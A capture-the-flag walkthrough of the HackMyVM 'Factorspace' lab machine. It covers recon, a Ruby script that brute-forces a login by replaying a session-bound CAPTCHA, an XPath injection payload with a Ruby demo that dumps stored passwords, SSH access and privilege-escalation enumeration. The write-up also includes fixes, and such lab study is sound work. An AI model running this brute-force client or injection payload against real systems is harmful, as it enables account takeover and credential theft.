[HackMyVM] Factorspace

Kali: 192.168.56.104

Target: 192.168.56.138

Port scan

┌──(root㉿kali2)-[~/Desktop]
└─# nmap 192.168.56.138
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-29 22:38 CST
Nmap scan report for 192.168.56.138
Host is up (0.000081s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:DD:D8:ED (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds

Two open ports: 22 and 80.

Quick directory brute force

# gobuster dir -u http://192.168.56.138   -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.138
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,txt,php,bak,zip
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 317] [--> http://192.168.56.138/images/]
/login.php            (Status: 200) [Size: 2346]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 19579]
/icon                 (Status: 301) [Size: 315] [--> http://192.168.56.138/icon/]
/results.php          (Status: 302) [Size: 115] [--> login.php]
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.138/css/]
/js                   (Status: 301) [Size: 313] [--> http://192.168.56.138/js/]
/check.php            (Status: 302) [Size: 0] [--> login.php]
/auth.php             (Status: 200) [Size: 0]
/fonts                (Status: 301) [Size: 316] [--> http://192.168.56.138/fonts/]
/parent               (Status: 301) [Size: 317] [--> http://192.168.56.138/parent/]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1323360 / 1323366 (100.00%)
===============================================================
Finished
===============================================================

login.php, results.php, check.php and auth.php look like the login-related scripts.

Let's look at the site itself.

Unremarkable, and nothing of interest in the page source either.

Hitting those PHP files directly, everything except login.php redirects back to login.php, so that is the only place to start.

The login form also has a CAPTCHA.

Submit some random input and capture the request.

The POST goes to auth.php with three parameters: username, password and captcha.

The CAPTCHA itself is fetched from this URL:

http://192.168.56.138/auth.php?generate_captcha=1

That leaves brute-forcing the password; I'm guessing the username is admin.

The CAPTCHA appears to stay the same for the lifetime of a session, so it does not stop a brute force: fetch it once, read it once, and replay the same value together with the same session cookie on every attempt.

The password comes out as iloveyou.
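An added illustration of why a session-sticky CAPTCHA is no defence (my example, not code from the box or from the original post). The Ruby is written against two assumptions the page never confirms: that auth.php?generate_captcha=1 sets the session cookie the CAPTCHA is bound to, and that a successful login answers with a redirect to results.php (gobuster showed results.php bouncing anonymous users to login.php, which makes the reverse the natural success signal). The CaptchaLogin class is a constructed in-memory model of the PHP side so the script runs offline; http_post_for is the same client pointed at the real auth.php.

```ruby
require 'net/http'
require 'uri'
require 'securerandom'

# ---- client ----------------------------------------------------------------
# One session cookie, one CAPTCHA value, replayed on every attempt. `post` is
# any callable that takes the form hash and returns {status:, location:}.
# Assumption: a good login answers with a redirect to results.php.
def replay_brute_force(passwords, username:, captcha:, post:)
  passwords.each do |pw|
    res = post.call('username' => username, 'password' => pw, 'captcha' => captcha)
    return pw if res[:location].to_s.include?('results.php')
  end
  nil
end

# Transport against the real box: open the session via the CAPTCHA endpoint,
# keep its cookie (assumed to be the PHP session the CAPTCHA is bound to) and
# save the CAPTCHA to captcha.bin so it can be read once by hand.
def http_post_for(base_url)
  uri  = URI(base_url)
  http = Net::HTTP.new(uri.host, uri.port)
  res  = http.get('/auth.php?generate_captcha=1')
  cookie = res['Set-Cookie'].to_s.split(';').first
  File.binwrite('captcha.bin', res.body)
  lambda do |form|
    req = Net::HTTP::Post.new('/auth.php', 'Cookie' => cookie)
    req.set_form_data(form)
    r = http.request(req)
    { status: r.code.to_i, location: r['Location'] }
  end
end

# ---- server model ----------------------------------------------------------
# Constructed in-memory stand-in for the PHP side (not the box's code).
# rotate: false keeps the CAPTCHA from generate_captcha=1 valid for the whole
# session, the behaviour observed above; rotate: true discards it after every
# check, so each attempt would need a fresh solve.
class CaptchaLogin
  attr_reader :attempts

  def initialize(username, password, rotate:)
    @username, @password, @rotate = username, password, rotate
    @captcha  = nil
    @attempts = 0
  end

  def generate_captcha
    @captcha = SecureRandom.alphanumeric(5)
  end

  def post(form)
    @attempts += 1
    captcha_ok = !@captcha.nil? && form['captcha'] == @captcha
    @captcha = nil if @rotate                     # single-use CAPTCHA: the fix
    return { status: 302, location: 'login.php?err=captcha' } unless captcha_ok
    if form['username'] == @username && form['password'] == @password
      { status: 302, location: 'results.php' }
    else
      { status: 302, location: 'login.php?err=creds' }
    end
  end
end

WORDLIST = %w[123456 password qwerty iloveyou letmein].freeze   # constructed sample

# Returns [password_or_nil, attempts_the_server_saw].
def demo(rotate:)
  server  = CaptchaLogin.new('admin', 'iloveyou', rotate: rotate)
  captcha = server.generate_captcha             # solved once, by hand, in the browser
  found   = replay_brute_force(WORDLIST, username: 'admin', captcha: captcha,
                               post: server.method(:post))
  [found, server.attempts]
end

if __FILE__ == $PROGRAM_NAME
  p sticky: demo(rotate: false), rotating: demo(rotate: true)
end
```

Against the sticky model the fourth attempt lands on iloveyou; against the rotating model every attempt after the first is rejected for a bad CAPTCHA, which is what the one-line server-side fix buys. For the real box: post = http_post_for('http://192.168.56.138'), read captcha.bin, then replay_brute_force(File.readlines('rockyou.txt', chomp: true), username: 'admin', captcha: 'the value you read', post: post).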

After logging in there is a name search box.

It is clearly injectable, but the usual SQL-style quote-closing payloads did not work, which was puzzling.

A web search on the symptoms pointed at XPath injection instead.

A CSDN blog post explaining XPath injection was the useful reference:

浅谈Xpath注入漏洞-CSDN博客

It gives this payload:

']|//*|//*['

Here the leading ' closes the attribute-value string and ] closes the predicate, //* then unions in every element of the document, and the trailing //*[' re-opens a string so that the application's own closing '] still parses. Spliced into the query from the blog post, the expression becomes:

user/username[@name='']|//*|//*['']

The first branch matches nothing (no user has an empty name), the middle //* matches every element, so the union returns the whole document, including the passwords of the three users in it.
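To make the mechanics concrete, an added Ruby example (mine, not code from the box or from the CSDN post) using REXML, Ruby's bundled XML library, which implements XPath 1.0 including the | union. The XML document, its element names and the passwords are constructed; the query shape user/username[@name='...'] is the one quoted above, and the real employee_info_2023.xml may well be laid out differently.

```ruby
require 'rexml/document'

# Constructed stand-in for employee_info_2023.xml. Element and attribute names
# follow the query shape quoted above; layout and values are assumptions.
EMPLOYEE_XML = <<~XML
  <employees>
    <user><username name="alice"/><role>ops</role><password>pw-alice-1</password></user>
    <user><username name="bob"/><role>dev</role><password>pw-bob-2</password></user>
    <user><username name="jackie"/><role>admin</role><password>pw-jackie-3</password></user>
  </employees>
XML

PAYLOAD = "']|//*|//*['"   # the payload from the blog post

def load_employees
  REXML::Document.new(EMPLOYEE_XML)
end

# Vulnerable: the search term is spliced straight into the XPath expression,
# exactly like the PHP snippet quoted above. With PAYLOAD it becomes
#   user/username[@name='']|//*|//*['']
# The first branch matches nothing, //* matches every element, and the last
# branch exists only so the application's own closing '] parses; whatever it
# selects, the union already holds every element in the document.
def search_vulnerable(doc, name)
  query = "user/username[@name='#{name}']"
  REXML::XPath.match(doc.root, query)
end

# What an attacker reads off the result page: every <password> element text.
def leaked_passwords(nodes)
  nodes.select { |n| n.is_a?(REXML::Element) && n.name == 'password' }
       .map(&:text).uniq.sort
end

# Hardened: XPath 1.0 has no escape sequence inside a string literal, so the
# dependable fix is to refuse anything that is not a plain name before it gets
# near the query (and, separately, to keep passwords out of searchable XML).
SAFE_NAME = /\A[A-Za-z0-9_.-]{1,64}\z/

def search_hardened(doc, name)
  raise ArgumentError, "rejected search term: #{name.inspect}" unless SAFE_NAME.match?(name)
  REXML::XPath.match(doc.root, "user/username[@name='#{name}']")
end

if __FILE__ == $PROGRAM_NAME
  doc = load_employees
  puts "normal search: #{search_vulnerable(doc, 'bob').map { |n| n.attributes['name'] }.inspect}"
  puts "injected:      #{leaked_passwords(search_vulnerable(doc, PAYLOAD)).inspect}"
  begin
    search_hardened(doc, PAYLOAD)
  rescue ArgumentError => e
    puts "hardened:      #{e.message}"
  end
end
```

A normal search returns one username node; the injected one returns every element, and filtering for <password> shows all three secrets. If the library in use supports XPath variables, binding the term as $name is the cleaner fix than an allowlist, but storing plaintext passwords next to searchable data is the root problem either way.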

Of the three, only qyxG27KGkW0x9SJ1 works, and it is jackie's SSH password.

┌──(root㉿kali2)-[~/Desktop]
└─# ssh jackie@192.168.56.138
jackie@192.168.56.138's password: 
Linux factorspace 5.10.0-21-amd64 #1 SMP Debian 5.10.162-1 (2023-01-21) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
jackie@factorspace:~$ whoami
jackie

jackie's home directory has the user flag.

jackie@factorspace:~$ ls -al
total 32
drwxr-xr-x 4 jackie jackie 4096 May  8  2023 .
drwxr-xr-x 3 root   root   4096 Apr  6  2023 ..
lrwxrwxrwx 1 root   root      9 Apr  6  2023 .bash_history -> /dev/null
-rw-r--r-- 1 jackie jackie  220 Apr 14  2023 .bash_logout
-rw-r--r-- 1 jackie jackie 3526 Apr 14  2023 .bashrc
drwxr-xr-x 3 jackie jackie 4096 Apr 14  2023 .local
-rw-r--r-- 1 jackie jackie  809 Apr 14  2023 .profile
drwx------ 2 jackie jackie 4096 Apr 14  2023 .ssh
-rwx------ 1 jackie jackie   33 Apr 14  2023 user.txt
jackie@factorspace:~$ cat user*
eb7d964a2a41006bb325cf822db664be

jackie is the only user under /home, so escalation has to start from this account.

jackie@factorspace:/home$ ls -al
total 12
drwxr-xr-x  3 root   root   4096 Apr  6  2023 .
drwxr-xr-x 18 root   root   4096 Feb  6  2023 ..
drwxr-xr-x  4 jackie jackie 4096 May  8  2023 jackie

Check sudo first

jackie@factorspace:~$ sudo -l
-bash: sudo: command not found

Nothing; sudo is not even installed.

Check the web root for anything useful

jackie@factorspace:/var/www/html$ ls -al
total 76
drwxr-xr-x 8 root root  4096 May  8  2023 .
drwxr-xr-x 3 root root  4096 Apr  9  2023 ..
-rw-r--r-- 1 root root  2009 Apr 14  2023 auth.php
-rw-r--r-- 1 root root   214 Apr 14  2023 check.php
drwxr-xr-x 2 root root  4096 Apr 14  2023 css
-rw-r--r-- 1 root root   544 Apr 14  2023 employee_info_2023.xml
-rw-r--r-- 1 root root  1373 Apr 14  2023 employee_search_filter.html
drwxr-xr-x 2 root root  4096 Apr 14  2023 fonts
drwxr-xr-x 2 root root  4096 Apr 14  2023 icon
drwxr-xr-x 2 root root  4096 Apr 14  2023 images
-rw-r--r-- 1 root root 19579 Apr 14  2023 index.html
drwxr-xr-x 2 root root  4096 Apr 14  2023 industrial-html
drwxr-xr-x 3 root root  4096 Apr 14  2023 js
-rw-r--r-- 1 root root  2346 Apr 14  2023 login.php
-rw-r--r-- 1 root root   634 Apr 14  2023 results.php

Nothing new. employee_info_2023.xml is the data file behind the search, which fits the XPath injection, but everything here is root-owned and read-only.

Check cron jobs

jackie@factorspace:/$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

Only the stock Debian entries.

Check SUID binaries

jackie@factorspace:/$ find / -perm -4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/mount
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/su
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/umount

All standard.

Kernel version

jackie@factorspace:/$ uname -a
Linux factorspace 5.10.0-21-amd64 #1 SMP Debian 5.10.162-1 (2023-01-21) x86_64 GNU/Linux

Fairly recent; a kernel exploit is unlikely to be the intended route.

Watch processes with pspy64

jackie@factorspace:~$ wget http://192.168.56.104:6677/pspy64
--2024-03-30 03:40:21--  http://192.168.56.104:6677/pspy64
Connecting to 192.168.56.104:6677... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: 'pspy64'

pspy64                          100%[=====================================================>]   2.94M  --.-KB/s    in 0.03s   

2024-03-30 03:40:21 (93.5 MB/s) - 'pspy64' saved [3078592/3078592]

jackie@factorspace:~$ chmod +x pspy64
jackie@factorspace:~$ ./pspy64
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2024/03/30 03:40:31 CMD: UID=1000 PID=987    | -bash 
2024/03/30 03:40:31 CMD: UID=1000 PID=986    | sshd: jackie@pts/0   
2024/03/30 03:40:31 CMD: UID=1000 PID=977    | (sd-pam) 
2024/03/30 03:40:31 CMD: UID=1000 PID=976    | /lib/systemd/systemd --user 
2024/03/30 03:40:31 CMD: UID=0    PID=973    | sshd: jackie [priv]  
2024/03/30 03:40:31 CMD: UID=0    PID=920    | 
2024/03/30 03:40:31 CMD: UID=0    PID=9      | 
2024/03/30 03:40:31 CMD: UID=0    PID=850    | 
2024/03/30 03:40:31 CMD: UID=33   PID=804    | /usr/sbin/apache2 -k start 
2024/03/30 03:40:31 CMD: UID=0    PID=8      | 
2024/03/30 03:40:31 CMD: UID=0    PID=67     | 
2024/03/30 03:40:31 CMD: UID=0    PID=66     | 
2024/03/30 03:40:31 CMD: UID=0    PID=63     | 
2024/03/30 03:40:31 CMD: UID=0    PID=6      | 
2024/03/30 03:40:31 CMD: UID=33   PID=538    | /usr/sbin/apache2 -k start 
2024/03/30 03:40:31 CMD: UID=33   PID=534    | /usr/sbin/apache2 -k start 
2024/03/30 03:40:31 CMD: UID=33   PID=533    | /usr/sbin/apache2 -k start 
2024/03/30 03:40:31 CMD: UID=33   PID=532    | /usr/sbin/apache2 -k start 
2024/03/30 03:40:31 CMD: UID=33   PID=531    | /usr/sbin/apache2 -k start 
2024/03/30 03:40:31 CMD: UID=33   PID=530    | /usr/sbin/apache2 -k start 
2024/03/30 03:40:31 CMD: UID=0    PID=53     | 
2024/03/30 03:40:31 CMD: UID=33   PID=529    | /usr/sbin/apache2 -k start 
2024/03/30 03:40:31 CMD: UID=0    PID=52     | 
2024/03/30 03:40:31 CMD: UID=0    PID=51     | 
2024/03/30 03:40:31 CMD: UID=0    PID=50     | 
2024/03/30 03:40:31 CMD: UID=0    PID=48     | 
2024/03/30 03:40:31 CMD: UID=0    PID=47     | 
2024/03/30 03:40:31 CMD: UID=0    PID=466    | /usr/sbin/apache2 -k start 
2024/03/30 03:40:31 CMD: UID=0    PID=461    | sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups 
2024/03/30 03:40:31 CMD: UID=0    PID=46     | 
2024/03/30 03:40:31 CMD: UID=0    PID=45     | 
2024/03/30 03:40:31 CMD: UID=0    PID=447    | /sbin/agetty -o -p -- \u --noclear tty1 linux 
2024/03/30 03:40:31 CMD: UID=0    PID=44     | 
2024/03/30 03:40:31 CMD: UID=0    PID=43     | 
2024/03/30 03:40:31 CMD: UID=0    PID=402    | /sbin/wpa_supplicant -u -s -O /run/wpa_supplicant 
2024/03/30 03:40:31 CMD: UID=0    PID=4      | 
2024/03/30 03:40:31 CMD: UID=0    PID=395    | /lib/systemd/systemd-logind 
2024/03/30 03:40:31 CMD: UID=0    PID=390    | /usr/sbin/rsyslogd -n -iNONE 
2024/03/30 03:40:31 CMD: UID=103  PID=376    | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only                                                                                                     
2024/03/30 03:40:31 CMD: UID=0    PID=375    | /usr/sbin/cron -f 
2024/03/30 03:40:31 CMD: UID=0    PID=344    | /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3                                                            
2024/03/30 03:40:31 CMD: UID=0    PID=341    | 
2024/03/30 03:40:31 CMD: UID=104  PID=340    | /lib/systemd/systemd-timesyncd 
2024/03/30 03:40:31 CMD: UID=0    PID=338    | 
2024/03/30 03:40:31 CMD: UID=0    PID=337    | 
2024/03/30 03:40:31 CMD: UID=0    PID=336    | 
2024/03/30 03:40:31 CMD: UID=0    PID=334    | 
2024/03/30 03:40:31 CMD: UID=0    PID=331    | 
2024/03/30 03:40:31 CMD: UID=0    PID=329    | 
2024/03/30 03:40:31 CMD: UID=0    PID=326    | 
2024/03/30 03:40:31 CMD: UID=0    PID=322    | 
2024/03/30 03:40:31 CMD: UID=0    PID=316    | 
2024/03/30 03:40:31 CMD: UID=0    PID=3      | 
2024/03/30 03:40:31 CMD: UID=0    PID=250    | 
2024/03/30 03:40:31 CMD: UID=0    PID=25     | 
2024/03/30 03:40:31 CMD: UID=0    PID=24     | 
2024/03/30 03:40:31 CMD: UID=0    PID=23     | 
2024/03/30 03:40:31 CMD: UID=0    PID=22     | 
2024/03/30 03:40:31 CMD: UID=0    PID=21     | 
2024/03/30 03:40:31 CMD: UID=0    PID=205    | /lib/systemd/systemd-udevd 
2024/03/30 03:40:31 CMD: UID=0    PID=20     | 
2024/03/30 03:40:31 CMD: UID=0    PID=2      | 
2024/03/30 03:40:31 CMD: UID=0    PID=19     | 
2024/03/30 03:40:31 CMD: UID=0    PID=185    | /lib/systemd/systemd-journald 
2024/03/30 03:40:31 CMD: UID=0    PID=18     | 
2024/03/30 03:40:31 CMD: UID=0    PID=17     | 
2024/03/30 03:40:31 CMD: UID=0    PID=15     | 
2024/03/30 03:40:31 CMD: UID=0    PID=149    | 
2024/03/30 03:40:31 CMD: UID=0    PID=148    | 
2024/03/30 03:40:31 CMD: UID=0    PID=13     | 
2024/03/30 03:40:31 CMD: UID=1000 PID=1208   | ./pspy64 
2024/03/30 03:40:31 CMD: UID=0    PID=1207   | 
2024/03/30 03:40:31 CMD: UID=0    PID=1205   | /bin/sleep 10 
2024/03/30 03:40:31 CMD: UID=0    PID=12     | 
2024/03/30 03:40:31 CMD: UID=0    PID=112    | 
2024/03/30 03:40:31 CMD: UID=0    PID=1106   | 
2024/03/30 03:40:31 CMD: UID=0    PID=110    | 
2024/03/30 03:40:31 CMD: UID=0    PID=11     | 
2024/03/30 03:40:31 CMD: UID=0    PID=109    | 
2024/03/30 03:40:31 CMD: UID=0    PID=108    | 
2024/03/30 03:40:31 CMD: UID=0    PID=107    | 
2024/03/30 03:40:31 CMD: UID=0    PID=106    | 
2024/03/30 03:40:31 CMD: UID=0    PID=1055   | 
2024/03/30 03:40:31 CMD: UID=0    PID=105    | 
2024/03/30 03:40:31 CMD: UID=0    PID=104    | 
2024/03/30 03:40:31 CMD: UID=0    PID=10     | 
2024/03/30 03:40:31 CMD: UID=0    PID=1      | /sbin/init 
2024/03/30 03:40:31 CMD: UID=0    PID=1216   | /sbin/init 
2024/03/30 03:40:32 CMD: UID=0    PID=1217   | (sleep) 
2024/03/30 03:40:40 CMD: UID=0    PID=1218   | /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3                                                            
2024/03/30 03:40:40 CMD: UID=0    PID=1219   | /bin/sh /sbin/dhclient-script 
2024/03/30 03:40:40 CMD: UID=0    PID=1220   | /bin/sh /sbin/dhclient-script 
2024/03/30 03:40:40 CMD: UID=0    PID=1221   | /bin/sh /sbin/dhclient-script 
2024/03/30 03:40:40 CMD: UID=0    PID=1222   | /bin/sh /sbin/dhclient-script 
2024/03/30 03:40:42 CMD: UID=0    PID=1223   | /sbin/init 
2024/03/30 03:40:42 CMD: UID=0    PID=1224   | /sbin/init 
2024/03/30 03:40:52 CMD: UID=0    PID=1225   | /sbin/init 
2024/03/30 03:40:52 CMD: UID=0    PID=1226   | /sbin/init 
2024/03/30 03:41:02 CMD: UID=0    PID=1227   | /sbin/init 
2024/03/30 03:41:02 CMD: UID=0    PID=1228   | /sbin/init 
2024/03/30 03:41:12 CMD: UID=0    PID=1229   | /sbin/init 
2024/03/30 03:41:13 CMD: UID=0    PID=1230   | /sbin/init 

Nothing obvious. In hindsight there is a hint in this output: root is running /bin/sleep 10 (PID 1205), and a pair of short-lived root children appears every ten seconds (03:40:42, 03:40:52, 03:41:02, 03:41:12), which is the footprint of a periodic root job; tracing the parent of that sleep process would have been worth a look.

Run linpeas

Still nothing.

ps auxww

jackie@factorspace:~/.ssh$  ps auxww
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.1  1.0 163708 10048 ?        Ss   03:04   0:05 /sbin/init
root           2  0.0  0.0      0     0 ?        S    03:04   0:00 [kthreadd]
root           3  0.0  0.0      0     0 ?        I<   03:04   0:00 [rcu_gp]
root           4  0.0  0.0      0     0 ?        I<   03:04   0:00 [rcu_par_gp]
root           6  0.0  0.0      0     0 ?        I<   03:04   0:00 [kworker/0:0H-events_highpri]
root           8  0.0  0.0      0     0 ?        I<   03:04   0:00 [mm_percpu_wq]
root           9  0.0  0.0      0     0 ?        S    03:04   0:00 [rcu_tasks_rude_]
root          10  0.0  0.0      0     0 ?        S    03:04   0:00 [rcu_tasks_trace]
root          11  0.3  0.0      0     0 ?        S    03:04   0:12 [ksoftirqd/0]
root          12  0.1  0.0      0     0 ?        I    03:04   0:04 [rcu_sched]
root          13  0.0  0.0      0     0 ?        S    03:04   0:00 [migration/0]
root          15  0.0  0.0      0     0 ?        S    03:04   0:00 [cpuhp/0]
root          17  0.0  0.0      0     0 ?        S    03:04   0:00 [kdevtmpfs]
root          18  0.0  0.0      0     0 ?        I<   03:04   0:00 [netns]
root          19  0.0  0.0      0     0 ?        S    03:04   0:00 [kauditd]
root          20  0.0  0.0      0     0 ?        S    03:04   0:00 [khungtaskd]
root          21  0.0  0.0      0     0 ?        S    03:04   0:00 [oom_reaper]
root          22  0.0  0.0      0     0 ?        I<   03:04   0:00 [writeback]
root          23  0.0  0.0      0     0 ?        S    03:04   0:00 [kcompactd0]
root          24  0.0  0.0      0     0 ?        SN   03:04   0:00 [ksmd]
root          25  0.0  0.0      0     0 ?        SN   03:04   0:00 [khugepaged]
root          43  0.0  0.0      0     0 ?        I<   03:04   0:00 [kintegrityd]
root          44  0.0  0.0      0     0 ?        I<   03:04   0:00 [kblockd]
root          45  0.0  0.0      0     0 ?        I<   03:04   0:00 [blkcg_punt_bio]
root          46  0.0  0.0      0     0 ?        I<   03:04   0:00 [edac-poller]
root          47  0.0  0.0      0     0 ?        I<   03:04   0:00 [devfreq_wq]
root          48  0.0  0.0      0     0 ?        I<   03:04   0:01 [kworker/0:1H-kblockd]
root          50  0.0  0.0      0     0 ?        S    03:04   0:00 [kswapd0]
root          51  0.0  0.0      0     0 ?        I<   03:04   0:00 [kthrotld]
root          52  0.0  0.0      0     0 ?        I<   03:04   0:00 [acpi_thermal_pm]
root          53  0.0  0.0      0     0 ?        I<   03:04   0:00 [ipv6_addrconf]
root          63  0.0  0.0      0     0 ?        I<   03:04   0:00 [kstrp]
root          66  0.0  0.0      0     0 ?        I<   03:04   0:00 [zswap-shrink]
root          67  0.0  0.0      0     0 ?        I<   03:04   0:00 [kworker/u3:0]
root         105  0.0  0.0      0     0 ?        I<   03:04   0:00 [ata_sff]
root         106  0.0  0.0      0     0 ?        S    03:04   0:00 [scsi_eh_0]
root         107  0.0  0.0      0     0 ?        I<   03:04   0:00 [scsi_tmf_0]
root         108  0.0  0.0      0     0 ?        S    03:04   0:00 [scsi_eh_1]
root         109  0.0  0.0      0     0 ?        I<   03:04   0:00 [scsi_tmf_1]
root         110  0.0  0.0      0     0 ?        S    03:04   0:00 [scsi_eh_2]
root         112  0.0  0.0      0     0 ?        I<   03:04   0:00 [scsi_tmf_2]
root         148  0.0  0.0      0     0 ?        S    03:04   0:00 [jbd2/sda1-8]
root         149  0.0  0.0      0     0 ?        I<   03:04   0:00 [ext4-rsv-conver]
root         185  0.0  1.7  48412 17656 ?        Ss   03:04   0:01 /lib/systemd/systemd-journald
root         205  0.0  0.5  21592  5156 ?        Ss   03:04   0:00 /lib/systemd/systemd-udevd
root         250  0.0  0.0      0     0 ?        I<   03:04   0:00 [cryptd]
root         316  0.0  0.0      0     0 ?        S    03:04   0:00 [irq/18-vmwgfx]
root         322  0.0  0.0      0     0 ?        I<   03:04   0:00 [ttm_swap]
root         326  0.0  0.0      0     0 ?        S    03:04   0:00 [card0-crtc0]
root         329  0.0  0.0      0     0 ?        S    03:04   0:00 [card0-crtc1]
root         331  0.0  0.0      0     0 ?        S    03:04   0:00 [card0-crtc2]
root         334  0.0  0.0      0     0 ?        S    03:04   0:00 [card0-crtc3]
root         336  0.0  0.0      0     0 ?        S    03:04   0:00 [card0-crtc4]
root         337  0.0  0.0      0     0 ?        S    03:04   0:00 [card0-crtc5]
root         338  0.0  0.0      0     0 ?        S    03:04   0:00 [card0-crtc6]
systemd+     340  0.0  0.6  88440  6004 ?        Ssl  03:04   0:00 /lib/systemd/systemd-timesyncd
root         341  0.0  0.0      0     0 ?        S    03:04   0:00 [card0-crtc7]
root         344  0.0  0.5  99888  5740 ?        Ssl  03:04   0:00 /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3
root         375  0.0  0.2   6748  2656 ?        Ss   03:04   0:00 /usr/sbin/cron -f
message+     376  0.0  0.4   8256  4656 ?        Ss   03:04   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root         390  0.0  0.4 220800  4032 ?        Ssl  03:04   0:00 /usr/sbin/rsyslogd -n -iNONE
root         395  0.0  0.7  22056  7184 ?        Ss   03:04   0:00 /lib/systemd/systemd-logind
root         402  0.0  0.5  14620  5152 ?        Ss   03:04   0:00 /sbin/wpa_supplicant -u -s -O /run/wpa_supplicant
root         447  0.0  0.1   5848  1708 tty1     Ss+  03:04   0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root         461  0.0  0.7  13356  7720 ?        Ss   03:04   0:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
root         466  0.0  2.3 208608 23084 ?        Ss   03:04   0:00 /usr/sbin/apache2 -k start
www-data     529  0.8  1.8 209260 18452 ?        S    03:04   0:30 /usr/sbin/apache2 -k start
www-data     530  0.8  1.7 209260 17460 ?        S    03:04   0:30 /usr/sbin/apache2 -k start
www-data     531  0.8  1.7 209260 17460 ?        S    03:04   0:30 /usr/sbin/apache2 -k start
www-data     532  0.8  1.8 209260 18532 ?        S    03:04   0:30 /usr/sbin/apache2 -k start
www-data     533  0.8  1.7 209260 17460 ?        S    03:04   0:30 /usr/sbin/apache2 -k start
www-data     534  0.8  1.7 209260 17456 ?        S    03:04   0:30 /usr/sbin/apache2 -k start
www-data     538  0.8  1.7 209260 17460 ?        S    03:04   0:30 /usr/sbin/apache2 -k start
www-data     804  0.6  1.7 209260 17460 ?        S    03:19   0:15 /usr/sbin/apache2 -k start
root         850  0.0  0.0      0     0 ?        I    03:22   0:00 [kworker/u2:2-flush-8:0]
root         920  0.0  0.0      0     0 ?        I    03:27   0:00 [kworker/u2:1-events_unbound]
root         973  0.0  0.9  14716  9068 ?        Ss   03:31   0:00 sshd: jackie [priv]
jackie       976  0.0  0.7  15184  7756 ?        Ss   03:31   0:00 /lib/systemd/systemd --user
jackie       977  0.0  0.2 166664  2580 ?        S    03:31   0:00 (sd-pam)
jackie       986  0.0  0.5  14716  5880 ?        S    03:31   0:00 sshd: jackie@pts/0
